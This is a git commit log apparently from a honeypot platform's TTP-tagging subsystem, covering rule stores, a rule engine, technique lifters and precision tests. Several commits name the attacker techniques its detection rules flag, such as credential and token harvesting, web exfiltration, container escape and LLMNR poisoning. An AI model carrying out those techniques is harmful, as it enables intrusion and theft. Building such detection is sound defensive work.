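An allowlist fails closed: a new payload field stays out of evidence until someone explicitly admits it.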
f211d394e6 feat(ttp): E.3.11 CanaryFingerprintLifter (R0049-R0053)
Browser-payload derivations per Appendix A.9: navigator.webdriver flag,
canvas/audio/WebGL automation hash matches (Puppeteer/Playwright/
Selenium/curl-impersonate), WebRTC IP leak, TZ/language vs source-IP
geo mismatch, navigator.platform vs userAgent vs WebGL renderer
inconsistency.

Evidence shape pinned to CanaryFingerprintEvidence (metric +
matched_signature) — raw fingerprint blobs (canvas hashes, full UAs,
navigator.platform values) explicitly NOT carried into TTPTag.evidence
per TTP_TAGGING.md §'Hard parts §7' (enrichment vs tag boundary). The
identity-merge guard rail is preserved: composite fp.id matches across
IPs are NOT a TTP, so no rule fires on the bare hash.

Tests: tests/ttp/test_canary_fingerprint_lifter.py per-rule positive +
negative + evidence-shape guard + state modulation.
tests/ttp/rule_precision/test_canary_rules.py xfail flipped to real
precision (R0049/R0050/R0051/R0053 H-band ≥95%; R0052 M-band ≥80%).
2026-05-01 20:25:57 -04:00
7865e71aa9 feat(ttp): E.3.10 IntelLifter (R0054-R0058)
Per-provider verdict translator for AbuseIPDB, GreyNoise, Feodo Tracker,
and ThreatFox per Appendix A.10. Each rule's predicate inspects payload
fields produced by the enrich worker (no DB I/O, no decnet.intel.*
imports — E.2.7 decoupling guard preserved). AbuseIPDB confidence is
scaled by abuse_confidence_score / 100; categories drive per-technique
fan-out. R0058 aggregate-bump is a no-op in v0 (cross-tag bump deferred
to E.3.14 worker bootstrap).

Per-provider null tolerance is the steady state — a missing provider
column produces zero tags from that rule, never an error.

Tests:
- tests/ttp/test_intel_lifter.py — per-provider positive + negative +
  state modulation + decoupling source-import guard.
- tests/ttp/rule_precision/test_intel_rules.py — xfail flipped, real
  precision driven over seed_intel.jsonl (R0054-R0057 H-band ≥95%;
  R0058 skipped as bump-only).
- tests/ttp/test_lifter_absence.py — IntelLifter all-populated test
  flipped from xfail-strict to real assertion with realistic payload.
- tests/ttp/test_lifters.py — partial-null xfail flipped to real
  assertion.
2026-05-01 20:23:42 -04:00
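A small sketch of the AbuseIPDB scaling and null tolerance described in 7865e71aa9. The function name and the clamping step are assumptions; only the `abuse_confidence_score / 100` factor comes from the commit.

```python
from typing import Any, Optional


def abuseipdb_confidence(base: float, payload: dict[str, Any]) -> Optional[float]:
    """Scale a rule's base confidence by the provider score; None if absent."""
    score = payload.get("abuse_confidence_score")
    if score is None:
        return None  # missing provider column: no tag, not an error
    clamped = max(0, min(100, score))  # assumed guard against out-of-range scores
    return base * clamped / 100


scaled = abuseipdb_confidence(0.8, {"abuse_confidence_score": 50})
absent = abuseipdb_confidence(0.8, {})
```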
eff3e4bce7 feat(ttp): E.3.9 BehavioralLifter (R0031-R0040)
Reads pre-shaped session aggregates from TaggerEvent.payload and emits
techniques per Appendix A behavior tables. Per-rule predicates dispatch
on match.kind (lifter:behavioral_<name>); the lifter holds its own
RuleIndex watching the same RuleStore as the engine, so disable / clip /
TTL state reaches lifter-bound rules through the same atomic-swap path.

R0032/R0036/R0037/R0040 YAMLs had over-escaped regex strings (one
level of backslash escaping too many); fixed in place.

Factory wired so default get_tagger() returns CompositeTagger with
BehavioralLifter shipped; remaining three lifters (E.3.10-E.3.12) land
in subsequent commits.

E.2.6 contract preserved via TolerantTagger: empty payload steady-state
yields [] with zero ERROR records. Disabled / clipped / expired state
verified.
2026-05-01 20:17:59 -04:00
321ea7a2a6 refactor(ttp): normalise lifter:<owner>_<name> match.kind prefix
E.3.9.1 prerequisite. Rules R0031-R0040 now use lifter:behavioral_*,
R0041 (open_relay) uses lifter:email_open_relay; the rest of the email,
canary, and intel cohorts already conformed. Each lifter at E.3.9-E.3.12
will claim its rules via str.startswith('lifter:<owner>_'), keeping the
ownership routing explicit and trivially extensible.

R0001-R0006 / R0030 lifter:* rules are E.3.13 (Identity/Credential)
territory and stay as-is.
2026-05-01 20:10:33 -04:00
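The prefix routing convention from 321ea7a2a6 can be sketched as follows. `owner_of`, the owner tuple, and the `"engine"` return value are hypothetical; `lifter:email_open_relay` is taken from the commit, while `lifter:behavioral_beaconing` is an illustrative kind.

```python
from typing import Optional

OWNERS = ("behavioral", "email", "canary", "intel")  # illustrative owner names


def owner_of(match_kind: str, owners: tuple[str, ...] = OWNERS) -> Optional[str]:
    """Return the owning lifter, "engine" for non-lifter kinds, None if unclaimed."""
    if not match_kind.startswith("lifter:"):
        return "engine"
    for owner in owners:
        if match_kind.startswith(f"lifter:{owner}_"):
            return owner
    return None  # a lifter:* kind that no registered lifter claims


routes = {
    kind: owner_of(kind)
    for kind in ("lifter:behavioral_beaconing", "lifter:email_open_relay", "pattern")
}
```

The trailing underscore in the prefix matters: without it, an owner named `intel` would also claim kinds belonging to a hypothetical `intelx` owner.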
e7531ee756 refactor(ttp): extract RuleIndex from RuleEngine
E.3.9.0 prerequisite for the per-source lifters (E.3.9-E.3.13). The
dispatch index, install/evict/apply_change atomic-swap protocol, and
state-modulation helpers (is_active / apply_ceiling) move out of
rule_engine.py into _rule_index.py and _state.py. RuleEngine wraps a
RuleIndex; back-compat shims preserve _by_kind / _by_rule / _install
attribute access for tests poking at the dispatch internals.

Lifters in E.3.9-E.3.12 will each hold their own RuleIndex, watching
the same RuleStore via subscribe_changes() fan-out. Hot-reload
semantics (disable / clip / TTL via set_state API) now reach
lifter-bound rules through the same atomic-swap path the engine uses,
not a future composite-rebuild compromise.
2026-05-01 20:09:18 -04:00
b819dfefa3 feat(ttp): E.3.8 R0054-R0058 intel cohort + mark step done
5 YAMLs for the intel-verdict cohort per Appendix B / A.10:
AbuseIPDB category mapping, GreyNoise classification, Feodo
Tracker hit, ThreatFox IOC type, aggregate-malicious bump-only.
IntelLifter (E.3.10) consumes by rule_id and tolerates absence
silently (null provider column → no tag).

R0058 is the meta bump-only rule — emits a single confidence=0.0
sentinel so it validates and surfaces in the catalogue, but the
repository's sub-0.3 drop ensures no fresh tag persists if the
fanout fires accidentally. test_intel_rules.py pins that
zero-confidence invariant.

Marks E.3.8 done in development/TTP_TAGGING.md with the cohort-
split summary.
2026-05-01 09:22:48 -04:00
dc1867315d feat(ttp): E.3.8 R0049-R0053 canary fingerprint cohort
5 YAMLs for the canary-fingerprint cohort per Appendix B / A.9:
navigator.webdriver flag, automation canvas/audio/WebGL hash match,
WebRTC IP leak, TZ/lang vs geo mismatch, platform inconsistency.
CanaryFingerprintLifter (E.3.11) consumes by rule_id.

test_canary_rules.py: YAML-present + inert-in-v0 + xfail(strict)
gated on E.3.11.
2026-05-01 09:21:01 -04:00
1ad15470a1 feat(ttp): E.3.8 R0041-R0048 email cohort
8 YAMLs for the email cohort per Appendix B: open-relay abuse,
mass phishing, phishing-kit X-Mailer signatures, IDN/punycode
URLs, sender masquerade, malicious attachment, BEC, encoded
payload in body. EmailLifter (E.3.12) consumes by rule_id.

test_email_rules.py: YAML-present + inert-in-v0 + xfail(strict)
precision case gated on E.3.12.
2026-05-01 09:19:56 -04:00
806301e179 feat(ttp): E.3.8 R0031-R0040 behavioral cohort
10 YAMLs for the behavioral / cross-event cohort per Appendix B:
beaconing, data destruction, ransom note, web exfil, DB mass-read,
credentials-in-files, k8s SA token harvest, Docker host escape,
LLMNR poisoning, TFTP router-config retrieval.

Every rule is lifter-bound (BehavioralLifter / IdentityLifter) —
the v0 RuleEngine cannot count, aggregate, or compose cross-event
signals, so these YAMLs declare the technique mappings the lifter
will consume by rule_id at E.3.9. Their match specs use a
'kind: lifter:*' shape inert to the regex matcher.

test_behavioral_rules.py asserts each YAML compiles, none fire
from the v0 engine (FP regression guard against a YAML drifting
into a regex), and an xfail(strict=True, reason='impl phase E.3.9')
precision case that will flip green when the lifter lands.
2026-05-01 09:18:27 -04:00
b1fe1f9403 feat(ttp): E.3.8 R0001-R0030 command cohort
30 YAMLs for the shell/command rule cohort per Appendix B (rules/ttp/).
Splits into engine-active (R0007-R0029, regex on command_text /
raw_url / user_agent) and lifter-bound (R0001-R0006, R0030 — the
v0 RuleEngine cannot count auth attempts, do identity rollups, or
parse fingerprint blobs; the BehavioralLifter / IdentityLifter /
CredentialLifter consume them by rule_id at E.3.9 / E.3.13).

test_command_rules.py asserts:
- every R000N has a YAML that compiles
- lifter-bound rules NEVER fire from the v0 engine (regression
  guard against a YAML drifting into a regex match.spec)
- engine-active rules meet their Appendix-C precision target
  against the seed corpus (≥0.95 high-conf, ≥0.80 medium)

Conftest fixes: precision_engine moved to module scope so the
module-scoped precomputed dispatch fixture (fired_by_label) can request it;
_RULES_DIR path bumped from parents[2] to parents[3] so the loader
resolves the project root regardless of pytest cwd; make_event
synthesizes attacker_uuid so TTPTag's anchor invariant is satisfied.

Seed corpus broadened: positive examples for every regex rule plus
6 negative examples across innocuous shell verbs (ls, echo, cd, ps,
df, free) so FPs surface in precision rather than passing vacuously.
2026-05-01 09:16:38 -04:00
c635478442 feat(ttp): E.3.8 corpus + harness — labelled holdout fixture
Sub-step preceding the rule-pack commits per TTP_TAGGING.md:2967.
Adds the per-rule precision suite scaffolding under
tests/ttp/rule_precision/:

- conftest.py: precision_engine fixture (RuleEngine populated from
  ./rules/ttp/), corpus_loader (real → seed → empty fallback),
  precision_for() helper for TP/FP accounting.
- _build_corpus.py: extractor for a real prod corpus pull. Mandatory
  --exclude-ip / DECNET_TTP_CORPUS_EXCLUDE_IPS — operator IPs never
  end up in the committed exclusion list. Pulls both 'command' and
  'unknown_command' event types.
- corpus/seed_*.jsonl: synthetic seed rows for each cohort so the
  harness still runs in clean checkouts.
- corpus/*.jsonl (operator-built) is gitignored.
- test_corpus_loads.py: sentinel that every seed file parses.
2026-05-01 09:08:07 -04:00
ed3f340ea8 feat(ttp): E.3.7 RuleEngine — evaluate + atomic-swap watch_store
Implements the rule engine body left empty at contract phase: evaluate()
dispatches by source_kind through self._by_kind, runs the rule's match
spec against event.payload, and emits one TTPTag per emits entry.
watch_store() loads the initial corpus from RuleStore.load_compiled,
then drains subscribe_changes, applying definition changes via
single-statement dict assignment (atomic swap, GIL-atomic to readers)
and state changes via NamedTuple._replace on the existing CompiledRule.

Why: with the FS + DB stores in place (E.3.5/E.3.6), the engine is the
last piece of the rule plane. Lifters (E.3.9–E.3.13) consume the
engine; the worker bootstrap (E.3.14) wires watch_store into the
asyncio event loop. After this commit a CompositeTagger constructed
with a RuleEngine + a populated rules dir will produce real tags.

Notes:
- CompiledRule.emits extended to 4-tuple
  (technique_id, sub_technique_id, tactic, confidence). Tactic + confidence
  ride per-emit so a single rule can carry multiple precision targets
  (the "one event maps to many techniques" property). Compile helpers in
  both backends extract them from the YAML emits dict; missing tactic
  or confidence is a deploy-time error.
- v0 match operator is "pattern" (regex). The field defaults per
  source_kind (command_text / raw_url / subject / verdict / …) and is
  overridable via match.field. Future ops (contains, equals, in_set)
  extend _match_event without touching the engine surface.
- Confidence model: rules with state="clipped" + confidence_max set
  cap the per-emit confidence downward; clipped is a soft suppress, not
  a hard skip. Disabled rules are skipped wholly; expires_at past is
  re-checked at evaluate as defense-in-depth (the store auto-reverts,
  but a racing read between expiry and revert must not fire the rule).
- _span(name, **attrs) helper in engine + both stores short-circuits on
  decnet.telemetry._ENABLED — matches the project's @traced /
  wrap_repository zero-overhead-when-disabled pattern instead of relying
  solely on the no-op tracer indirection.
- Late-bound tracer (telemetry.get_tracer called per-span, not at
  module load) so test_tracing's monkeypatch reaches the production
  code path.

xfails flipped: tests/ttp/test_rule_engine.py multi-emit fan-out +
rule_version-collision-via-engine; tests/ttp/test_multi_mapping.py
N×M engine fan-out + idempotent replay; tests/ttp/test_tracing.py
ttp.eval span hierarchy + ttp.rule.fire span attributes.

Tests: 214 passed, 19 xfailed (gated on E.3.8 lifters / rule pack /
worker bootstrap).
mypy: clean on prod code; pre-existing test-stub arg-type warnings
unchanged.
2026-05-01 08:49:15 -04:00
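The swap and clipping mechanics from ed3f340ea8 can be sketched with a reduced `CompiledRule`. The field subset, the `"enabled"` default state, and the R0014 to T1105 mapping are assumptions for illustration only.

```python
from typing import NamedTuple, Optional


class CompiledRule(NamedTuple):
    """Hypothetical subset of the real CompiledRule."""
    rule_id: str
    # Each emit: (technique_id, sub_technique_id, tactic, confidence)
    emits: tuple[tuple[str, Optional[str], str, float], ...]
    state: str = "enabled"
    confidence_max: Optional[float] = None


def apply_ceiling(rule: CompiledRule, confidence: float) -> float:
    """Clipped rules cap confidence downward; other states leave it alone."""
    if rule.state == "clipped" and rule.confidence_max is not None:
        return min(confidence, rule.confidence_max)
    return confidence


by_rule: dict[str, CompiledRule] = {}
original = CompiledRule("R0014", (("T1105", None, "command-and-control", 0.9),))

# Definition change: a single dict assignment swaps the whole rule in.
by_rule[original.rule_id] = original

# State change: _replace builds a new tuple, so readers holding the old
# object never observe a half-updated rule.
by_rule["R0014"] = by_rule["R0014"]._replace(state="clipped", confidence_max=0.5)

clipped_confidence = apply_ceiling(by_rule["R0014"], 0.9)
```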
8a93ee3129 feat(ttp): E.3.6 DatabaseRuleStore — ttp_rule/ttp_rule_state + master sync
Implements the DB-backed rule store body left empty at contract phase:
load_compiled reads from ttp_rule + ttp_rule_state; get_state /
set_state hit ttp_rule_state with the same expires_at auto-revert and
bus-event semantics as the FS backend; subscribe_changes returns a
per-subscriber queue. State persists across process restarts — the
swarm property the FS backend deliberately doesn't have.

Also lands two swarm-mode helpers:
- sync_from_filesystem(fs_store) — master-side, subscribes to a
  FilesystemRuleStore and projects each RuleChange onto a ttp_rule
  upsert/delete.
- tail_db(poll_interval) — worker-side, watermark poll over
  ttp_rule.updated_at; emits RuleChange("definition", ...) for each
  row that moved.

Why: swarm mode needs rule definitions and operator state to
propagate across hosts. The filesystem backend (E.3.5) was the
single-host-dev variant; this one survives restart and serves N
workers from a shared DB.

Notes:
- DatabaseRuleStore() with no args lazy-inits an in-memory SQLite
  repo so the conformance fixture works without test plumbing. In
  production the worker bootstrap (E.3.14) passes an explicit repo.
- The conftest.py rule_store fixture became async (pytest_asyncio),
  per-backend creates/initializes a SQLite repo for the DB run.
- Adds a `seed_rule(store, rule_id, yaml)` helper to bridge backend
  semantics: drop a YAML file (FS) vs insert a ttp_rule row (DB).
  Used by the parametrized load_compiled conformance test.
- Late-bound _tracer() in both backends (was module-level get_tracer
  binding) so test_tracing's monkeypatch of decnet.telemetry.get_tracer
  actually affects span output.

xfails flipped: tests/ttp/store/test_database.py set_state-writes-to-
ttp_rule_state + filesystem-to-DB sync; tests/ttp/store/test_conformance.py
DB-side load_compiled / set_state isolation / round-trip / per-rule
fan-out / expired-state revert / set_state failure / get_state default
(was xfail-only-on-DB); tests/ttp/test_tracing.py set_state span
hierarchy.

Tests: 208 passed, 25 xfailed (gated on E.3.7 + lifters).
mypy: clean on all touched files.
2026-05-01 08:39:46 -04:00
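The worker-side watermark poll that `tail_db` performs in 8a93ee3129 might be sketched like this with `sqlite3`. The `poll_changes` helper, the integer timestamps, and the column set are assumptions; the real method is async and emits `RuleChange` objects.

```python
import sqlite3


def poll_changes(
    conn: sqlite3.Connection, watermark: int
) -> tuple[list[tuple[str, str]], int]:
    """Return ("definition", rule_id) for rows newer than the watermark."""
    rows = conn.execute(
        "SELECT rule_id, updated_at FROM ttp_rule "
        "WHERE updated_at > ? ORDER BY updated_at",
        (watermark,),
    ).fetchall()
    changes = [("definition", rule_id) for rule_id, _ in rows]
    new_watermark = rows[-1][1] if rows else watermark
    return changes, new_watermark


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE ttp_rule (rule_id TEXT PRIMARY KEY, updated_at INTEGER)")
conn.executemany("INSERT INTO ttp_rule VALUES (?, ?)", [("R0001", 10), ("R0002", 20)])

initial, mark = poll_changes(conn, 0)  # first poll sees both rows
idle, mark = poll_changes(conn, mark)  # nothing moved since
conn.execute("UPDATE ttp_rule SET updated_at = 30 WHERE rule_id = 'R0001'")
moved, mark = poll_changes(conn, mark)  # only the touched row
```

A strict `>` comparison can miss rows that share the watermark's timestamp, so a production poll would likely need a tie-breaker or a monotonic version column.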
f41995a229 feat(ttp): E.3.5 FilesystemRuleStore — inotify hot-reload + per-rule events
Implements the filesystem-backed rule store body left empty at contract
phase: YAML parse + Pydantic validation, asyncinotify watch over
./rules/ttp/, in-process state cache with auto-revert on expires_at,
and a subscribe_changes() async iterator yielding one RuleChange per
per-rule edit. Bus topic builders ttp_rule_reloaded / ttp_rule_state
ship alongside.

Why: the rule plane needed a store before the engine (E.3.7) could
consume RuleChange events and atomically swap compiled rules into its
dispatch index.

Notes:
- Linux-only by construction (asyncinotify wheel gated by sys_platform
  marker; FilesystemRuleStore.__init__ raises on non-Linux).
- Filename allowlist is the FIRST check on every inotify event.
- Content-hash dedup so a single write firing IN_CREATE + IN_CLOSE_WRITE
  produces exactly one RuleChange.
- All compile work serializes on a single asyncio.Lock.
- Subscribers register their queue eagerly so events fired between
  subscribe_changes() and the first __anext__() are buffered.

xfails flipped: per-save-style + filter-ordering + atomic-swap in
test_filesystem.py; load_compiled / set_state isolation / round-trip /
per-rule fan-out / expired-state revert / set_state failure semantics
in test_conformance.py (FS side; DB side stays xfail until E.3.6);
malformed-YAML compile-time check in test_rule_engine.py.

Tests: 197 passed, 35 xfailed (gated on E.3.6 / E.3.7 / lifters).
mypy + bandit: clean on all touched files.

Wiki update for the per-rule reload + state-change topics lands in a
matching wiki-checkout/Service-Bus.md edit (separate repo).
2026-05-01 08:31:05 -04:00
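Two of the guards noted in f41995a229, the filename allowlist and content-hash dedup, can be sketched together. The regex and the `Deduper` class are hypothetical; the commit only states that an allowlist with a fullmatch anchor is checked first and that identical content yields one change.

```python
import hashlib
import re

# Assumed pattern: rule files named like R0001.yaml or R0001_name.yml.
RULE_FILENAME = re.compile(r"R\d{4}[A-Za-z0-9_-]*\.ya?ml")


class Deduper:
    """Emit a change only for allowlisted files whose content actually changed."""

    def __init__(self) -> None:
        self._last_digest: dict[str, str] = {}

    def should_emit(self, filename: str, content: bytes) -> bool:
        # Allowlist first: editor scratch files never reach the parser.
        if RULE_FILENAME.fullmatch(filename) is None:
            return False
        digest = hashlib.sha256(content).hexdigest()
        if self._last_digest.get(filename) == digest:
            return False  # second event for the same write
        self._last_digest[filename] = digest
        return True


dedup = Deduper()
results = [
    dedup.should_emit(".R0001.yaml.swp", b"x"),        # scratch file
    dedup.should_emit("R0001.yaml", b"name: a"),        # first event for a write
    dedup.should_emit("R0001.yaml", b"name: a"),        # duplicate event
    dedup.should_emit("R0001.yaml", b"name: b"),        # real edit
]
```

Using `fullmatch` rather than `match` is what rejects names such as `R0001.yaml~`, where a valid prefix is followed by editor residue.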
89ce893792 feat(ttp): E.3.4 API handlers wired to repo (rollups + Navigator)
Five GET rollup endpoints (techniques, by-identity, by-attacker,
by-campaign, by-session) and the Navigator export (fleet +
per-identity) now call into the TTPMixin methods. Rule catalogue
endpoint still returns [] — backed by the RuleStore which lands
at E.3.5/E.3.6.
2026-05-01 08:06:53 -04:00
fee697694d feat(ttp): E.3.3 repository — insert_tags + listing rollups (dual backend)
Dialect-split: portable rollup queries on TTPMixin; bulk insert with
ON CONFLICT DO NOTHING / INSERT IGNORE in the per-dialect repos.
Confidence-floor (< 0.3) drop applied at mixin layer before the
dialect hook. BaseRepository now declares the six TTP methods abstract.

Tests in tests/web/db/test_ttp_repo.py flipped from pytest.fail stubs
to real dual-backend behavioral tests; tests/ttp/test_confidence.py
drop-below-floor xfail removed.
2026-05-01 08:04:46 -04:00
226b3adfa2 docs(ttp): mark E.3.1 + E.3.2 done — schema/bus verification 2026-05-01 07:57:38 -04:00
3664ea7008 docs(ttp): mark E.2.9–E.2.14b as done in design doc
Each section gets a Status: done block summarising what's GREEN
today vs xfail-gated and noting any divergence from the doc's
original wording (E.2.9 lossy observable phases; E.2.13 db_backends
fixture landed alongside; E.2.14a Jaeger-skip + tracing-enabled
plumbing; E.2.14b NamedTuple AttributeError vs FrozenInstanceError).
2026-05-01 07:47:01 -04:00
0217319423 test(ttp): E.2.14b RuleStore conformance — cross-backend + filesystem-specific + database-specific
tests/ttp/store/conftest.py — parametrized rule_store fixture over
FilesystemRuleStore (skipped on non-Linux) + DatabaseRuleStore.

test_conformance.py — shared assertions (default-state, set_state
isolation/round-trip, subscribe_changes per-rule fan-out, expires_at
auto-revert, set_state failure semantics) parametrize over both.
get_state-default GREEN today on FS (returns RuleState() for empty
cache); rest xfail-gated behind E.3.5/E.3.6.

test_filesystem.py — inotify mask + canonical kernel values + 9
scratch-filename rejections + 4 valid-filename acceptances +
fullmatch anchor + tmp_path construction + CompiledRule frozen
property GREEN today; per-save-style + filter-ordering +
atomic-swap concurrency xfail-gated.

test_database.py — class-level surface (no platform guard, ABC
methods concrete, async coroutines) GREEN today; ttp_rule_state
write + filesystem→DB sync xfail-gated behind E.3.6.
2026-05-01 07:45:32 -04:00
bf5414c0d1 test(ttp): E.2.14a follow-up — force DECNET_DEVELOPER_TRACING=true, skip when Jaeger unreachable
Session-scoped autouse fixture in tests/ttp/conftest.py sets
DECNET_DEVELOPER_TRACING=true and forces decnet.telemetry._ENABLED
so the no-op tracer doesn't silently swallow emitted spans. The
span_exporter fixture also monkeypatches decnet.telemetry.get_tracer
so production code under test lands spans in the in-memory
exporter. Tracing tests skip when DECNET_OTEL_ENDPOINT (default
localhost:4317) isn't reachable so the dev loop stays green
without lying about coverage.
2026-05-01 07:42:22 -04:00
f4fe6fe6e4 test(ttp): E.2.14a observability tracing — span hierarchy + no-PII property
In-memory span exporter fixture wired to a per-test TracerProvider
(OTEL global is locked once set, so each test gets its own).
ttp.eval / ttp.lifter.{name} / ttp.rule.fire / ttp.rule.state.change
hierarchy + no-PII canary battery xfail-gated behind E.3.5–E.3.13.
2026-05-01 07:40:58 -04:00
4a93e16407 test(ttp): E.2.13 repository tests — TTPMixin idempotency + identity-rollup projection on dual backends
Adds tests/web/db/conftest.py with a db_backends fixture
parametrizing SQLite (always) + MySQL (gated on
DECNET_TEST_MYSQL_URL). Surface assertions (mixin methods present
+ async) GREEN today; insert_tags idempotency, identity rollup
projection, attacker-rollup exclusion of NULL-attacker tags
xfail-gated behind E.3.3.
2026-05-01 07:39:16 -04:00
6814949bc0 test(ttp): E.2.12 worker bus integration — _TOPICS equality, loop-prevention, delivery asymmetry
Pin _TOPICS frozenset against documented set (single source of
truth). Worker→engine invocation, loop-prevention invariant,
attacker.enriched/email.received catch-up asymmetry xfail-gated
behind E.3.14.
2026-05-01 07:37:58 -04:00
c276b5696e test(ttp): E.2.11 multi-mapping property — N×M fan-out, idempotent UUID, replay-safety
Hypothesis property: N rule_ids × M technique_ids on one event yield
N×M distinct tag UUIDs. Worked example pinned: one rule emitting
(T1110, None) and (T1078, None) → two distinct UUIDs. Engine-level
fan-out + replay xfail-gated behind E.3.7.
2026-05-01 07:36:19 -04:00
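The N×M property pinned in c276b5696e follows from hashing every distinguishing field into the tag UUID. The namespace and this `compute_tag_uuid` signature are assumptions for the sketch; the project's actual key layout may differ.

```python
import uuid
from itertools import product
from typing import Optional

# Hypothetical namespace; any fixed UUID works as long as it never changes.
TAG_NAMESPACE = uuid.uuid5(uuid.NAMESPACE_URL, "https://example.invalid/ttp-tag")


def compute_tag_uuid(
    source_kind: str,
    source_id: str,
    rule_id: str,
    technique_id: str,
    sub_technique_id: Optional[str] = None,
) -> uuid.UUID:
    """Derive a deterministic UUID from the fields that identify one tag."""
    key = "|".join([source_kind, source_id, rule_id, technique_id, sub_technique_id or ""])
    return uuid.uuid5(TAG_NAMESPACE, key)


rule_ids = ["R0001", "R0002", "R0003"]  # N = 3
technique_ids = ["T1110", "T1078"]      # M = 2

first_run = {
    compute_tag_uuid("command", "evt-1", r, t) for r, t in product(rule_ids, technique_ids)
}
replay = {
    compute_tag_uuid("command", "evt-1", r, t) for r, t in product(rule_ids, technique_ids)
}
```

Because the UUID is a pure function of its inputs, a replayed event collides with its earlier rows instead of creating new ones.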
fd81be0bb1 test(ttp): E.2.10 confidence model — downward-only multiplier property, drop-below-0.3, AbuseIPDB-30 worked example
Pure-arithmetic adjustment formula pinned via Hypothesis property
test (multiplier ∈ [0,1] cannot raise base). Drop-at-floor and
provider-score multiplier xfail-gated behind E.3.3 / E.3.10.
2026-05-01 07:34:58 -04:00
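A sketch of the downward-only adjustment and the 0.3 floor from fd81be0bb1. The function names and the base confidence of 0.9 are illustrative; this is not the commit's own worked example, only arithmetic in the same spirit.

```python
CONFIDENCE_FLOOR = 0.3  # tags below this are dropped before persistence


def adjust(base: float, multiplier: float) -> float:
    """Apply a multiplier in [0, 1]; the result can never exceed the base."""
    if not 0.0 <= multiplier <= 1.0:
        raise ValueError("multiplier must lie in [0, 1]")
    return base * multiplier


def survives(confidence: float) -> bool:
    return confidence >= CONFIDENCE_FLOOR


# A provider score of 30 out of 100 acts as a 0.3 multiplier.
low_score = adjust(0.9, 30 / 100)
mid_score = adjust(0.9, 50 / 100)
kept = [c for c in (low_score, mid_score) if survives(c)]
```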
79e6df8343 test(ttp): E.2.9 UKC bridge bijection — pin tactic↔phase mapping, observable round-trip, lossy phases
Pre-target phases (RECONNAISSANCE/RESOURCE_DEVELOPMENT/WEAPONIZATION/
SOCIAL_ENGINEERING) and observable-but-unmappable phases (EXPLOITATION/
PIVOTING/OBJECTIVES, UKC-only concepts ATT&CK lacks tactics for) are
pinned as lossy via _LOSSY_INVERSE_REFERENCE so a future contributor
cannot 'fix' the asymmetry without tripping the suite.
2026-05-01 07:33:47 -04:00
bcd1f14cd3 feat(ttp): E.1.11 RuleStore contract — base ABC, factory, filesystem + database stubs
Adds decnet/ttp/store/ subpackage:
- base.py: RuleState frozen dataclass, RuleChange NamedTuple, RuleStore ABC
- factory.py: get_rule_store() reading DECNET_TTP_RULE_STORE_TYPE
- impl/filesystem.py: FilesystemRuleStore with sys.platform=='linux'
  fail-fast guard, allowlist filename regex, raw inotify mask bits
  (lib import deferred to E.3 so contract phase compiles without the
  asyncinotify dep installed)
- impl/database.py: DatabaseRuleStore stub (no platform guard)

TTPRule + TTPRuleState SQLModels were already shipped at E.1.1; this
commit closes the type-only TYPE_CHECKING forward-ref in
rule_engine.py via real runtime imports through the new package.
2026-05-01 07:25:09 -04:00
b6e31e64e9 feat(ttp): E.1.10 repository contract — TTPMixin with insert_tags + list_techniques_by_{identity,attacker,campaign,session} + list_distinct_techniques
Empty NotImplementedError bodies; the SQL lands at E.3 implementation.
Mixin composed onto SQLModelRepository alongside the existing domain
mixins. Dialect-specific INSERT-OR-IGNORE syntax overrides land in
the per-backend subclasses at E.3 per the dual-DB-backend convention.
2026-05-01 07:21:37 -04:00
b7f206c8c5 feat(ttp): E.1.9 API contract — seven router endpoints, admin-gated state mutations, response models
Mounts /api/v1/ttp/* with empty-list / empty-Navigator responses.
GET endpoints viewer-gated; POST/DELETE /rules/{rule_id}/state
admin-gated server-side. POST parses JSON manually so a malformed
body returns the documented 400 (per feedback_schemathesis_400).

Drops xfail-strict markers from E.2.8 tests now that the router is
mounted; 26 tests pass against the contract handlers.
2026-05-01 07:20:13 -04:00
cfbfaabfcd feat(ttp): E.1.8 UKC bridge contract — ATTACK_TACTIC_TO_UKC + tactic_to_ukc_phase + inverse 2026-05-01 07:12:00 -04:00
b5a19301a2 test(ttp): E.2.8 API shape + auth — GET 200/401 + admin-only POST/DELETE 401/403/200/400 contract 2026-05-01 07:00:41 -04:00
0cdf8d90da test(ttp): E.2.7 decoupling lint — TTP code may not import decnet.intel.* providers or decnet.profiler.keystroke 2026-05-01 06:58:12 -04:00
e2078c868d test(ttp): E.2.6 lifter tolerates absence — six lifters return [] on empty joins, no ERROR logs 2026-05-01 06:57:29 -04:00
1ffaa3df41 test(ttp): E.2.5 RuleEngine behavior — empty store, malformed YAML, multi-emit fan-out, version collisions 2026-05-01 06:56:28 -04:00
5accf8f1b1 test(ttp): E.2.4 Tagger ABC conformance — hypothesis fuzz over swallowed Exception types 2026-05-01 06:54:29 -04:00
cce84f23dc test(bus): E.2.3 TTP topic naming — constants, builders, wildcard match 2026-05-01 06:53:05 -04:00
e58aa4fe3a test(ttp): E.2.2 idempotency — determinism, golden value, replay-safety signature lock 2026-05-01 06:45:49 -04:00
e6f1da2344 test(ttp): E.2.1b evidence shape — TypedDict keys, PII §6 type-level assertion 2026-05-01 06:45:35 -04:00
c3a799726f test(ttp): E.2.1 schema invariant tests — CHECK, ValueError guard, UUIDv5, JSON round-trip 2026-05-01 06:44:57 -04:00
19cc8aa859 feat(ttp): E.1.7 worker contract — run_ttp_worker_loop, _TOPICS, registry entry 2026-05-01 06:33:34 -04:00
208ffd8f4f feat(ttp): E.1.6 per-lifter contracts — six TolerantTagger subclasses 2026-05-01 06:31:31 -04:00
cb9d183c20 feat(ttp): E.1.5 RuleEngine contract — CompiledRule, RuleSchema, RuleEngine ABC 2026-05-01 06:30:12 -04:00
a703f9eda7 docs(ttp): mark E.1.3 and E.1.4 as done in design doc 2026-05-01 06:22:08 -04:00
c3c5813211 feat(ttp): E.1.3+E.1.4 Tagger ABC and composite factory contract
Third and fourth TTP-tagging contract commits, plus a scoped subset
of the E.2.4 conformance tests covering the contract surface shipped
here (full hypothesis-fuzz suite still lands with E.2.4).

E.1.3 — decnet/ttp/base.py
- TaggerEvent NamedTuple: source_kind, source_id, attacker_uuid,
  identity_uuid, session_id, decky_id, opaque payload.
- Tagger(ABC) with abstract async tag(); class-level name and
  HANDLES: frozenset[str] (default empty so a misconfigured subclass
  is loudly idle, not loudly noisy).
- TolerantTagger(Tagger): concrete tag() wraps abstract _tag_impl()
  in try/except Exception (deliberately not BaseException — so
  KeyboardInterrupt / SystemExit / asyncio.CancelledError propagate
  and the worker can shut down cleanly). Swallowed exceptions log
  at WARNING with exc_info, never ERROR — absence is the steady
  state, not a bug. Subclasses override _tag_impl, never tag — the
